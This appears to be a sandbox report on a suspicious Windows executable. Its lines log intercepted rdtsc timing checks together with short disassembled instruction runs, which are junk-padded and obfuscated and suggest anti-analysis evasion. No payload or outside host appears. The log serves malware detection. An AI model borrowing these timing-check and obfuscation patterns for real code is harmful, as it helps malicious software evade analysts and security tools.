Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4CFCE second address: F4CFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4D7CA second address: F4D7D4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4E726 second address: F4E72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4E72E second address: F4E747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4E747 second address: F4E74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4E74B second address: F4E787 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FF34080AB11h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jp 00007FF34080AB06h 0x00000020 popad 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jnp 00007FF34080AB08h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4E787 second address: F4E791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5313C second address: F53162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB10h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FF34080AB06h 0x00000015 jnc 00007FF34080AB06h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F53162 second address: F53192 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3408102F6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF3408102FAh 0x00000015 jmp 00007FF340810306h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F53192 second address: F531B8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF34080AB1Bh 0x00000008 jmp 00007FF34080AB15h 0x0000000d push eax 0x0000000e jg 00007FF34080AB06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52619 second address: F5261F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52760 second address: F527AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007FF34080AB0Dh 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 je 00007FF34080AB06h 0x0000001c jng 00007FF34080AB06h 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007FF34080AB13h 0x00000029 jng 00007FF34080AB06h 0x0000002f push edi 0x00000030 pop edi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52CB8 second address: F52CBE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52CBE second address: F52CDC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007FF34080AB06h 0x00000009 pop edi 0x0000000a push esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FF34080AB08h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52CDC second address: F52CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52CE2 second address: F52CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52CE6 second address: F52D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810304h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52D00 second address: F52D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52E68 second address: F52E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FF3408102F6h 0x00000011 pop ebx 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F53987 second address: F5398F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F53EB9 second address: F53EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5467D second address: F5468A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F54829 second address: F54833 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF3408102FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F549D2 second address: F549D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F54B22 second address: F54B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F550C6 second address: F550CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F550CB second address: F550D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F569AB second address: F569F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB10h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FF34080AB10h 0x00000012 jmp 00007FF34080AB0Bh 0x00000017 popad 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007FF34080AB12h 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FF34080AB0Ah 0x00000028 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F558EF second address: F558F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F558F4 second address: F558FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F582F3 second address: F582F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F582F7 second address: F5835B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FF34080AB08h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 jmp 00007FF34080AB12h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FF34080AB08h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5835B second address: F58365 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F58365 second address: F5836A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5836A second address: F58370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5BFCD second address: F5BFDD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FF34080AB0Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5A261 second address: F5A26B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5BFDD second address: F5BFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5BFE9 second address: F5BFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5DA0E second address: F5DA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5DA12 second address: F5DA23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edi 0x00000009 jng 00007FF3408102FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6158C second address: F61592 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F61592 second address: F61598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F61598 second address: F6159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6159C second address: F61633 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b ja 00007FF340810306h 0x00000011 push 00000000h 0x00000013 je 00007FF340810303h 0x00000019 jmp 00007FF3408102FDh 0x0000001e sub dword ptr [ebp+122D3542h], ebx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007FF3408102F8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 mov dword ptr [ebp+12452F13h], ecx 0x00000046 jng 00007FF3408102FCh 0x0000004c xor edi, 345547FBh 0x00000052 jmp 00007FF340810306h 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jnc 00007FF3408102F6h 0x00000061 pushad 0x00000062 popad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6250C second address: F62512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F62512 second address: F62516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F62516 second address: F62577 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FF34080AB08h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D37F6h], edx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FF34080AB08h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 movzx ebx, ax 0x00000048 push 00000000h 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F62577 second address: F6257B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6257B second address: F62581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F62581 second address: F62587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F62587 second address: F6258B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F64461 second address: F644C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007FF3408102F8h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FF3408102F8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+122D2B82h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FF3408102F8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b push 00000000h 0x0000004d mov dword ptr [ebp+12484291h], edx 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F636B7 second address: F636BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F636BB second address: F63715 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D38A5h], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov ebx, edx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 add di, 5C19h 0x00000028 mov eax, dword ptr [ebp+122D0C55h] 0x0000002e mov dword ptr [ebp+122D184Eh], edi 0x00000034 push FFFFFFFFh 0x00000036 add edi, 568EA3B1h 0x0000003c mov ebx, dword ptr [ebp+122D1BEFh] 0x00000042 nop 0x00000043 pushad 0x00000044 jmp 00007FF340810302h 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c pop esi 0x0000004d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F63715 second address: F63719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F64667 second address: F64682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810307h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F65748 second address: F6574C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6660F second address: F66614 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F66614 second address: F66621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6A3A3 second address: F6A3A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6B48D second address: F6B491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C3E5 second address: F6C3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C3EC second address: F6C403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C403 second address: F6C407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C407 second address: F6C40B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F694AD second address: F694B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6A5FB second address: F6A606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6D314 second address: F6D319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C5B9 second address: F6C5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C5BF second address: F6C5C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6D3CE second address: F6D3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C662 second address: F6C666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6C666 second address: F6C66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6D530 second address: F6D5C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810305h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF340810303h 0x0000000f nop 0x00000010 cmc 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f jmp 00007FF340810300h 0x00000024 mov eax, dword ptr [ebp+122D0A19h] 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FF3408102F8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 movzx edi, ax 0x00000047 push FFFFFFFFh 0x00000049 mov dword ptr [ebp+12460B3Fh], ebx 0x0000004f mov ebx, dword ptr [ebp+1245A942h] 0x00000055 nop 0x00000056 pushad 0x00000057 pushad 0x00000058 push eax 0x00000059 pop eax 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6D5C0 second address: F6D5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6D5D0 second address: F6D5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6E5D6 second address: F6E5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6E5DA second address: F6E5E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6E5E4 second address: F6E5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F6E691 second address: F6E697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F7052D second address: F70532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0B81D second address: F0B828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF3408102F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F0B828 second address: F0B82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
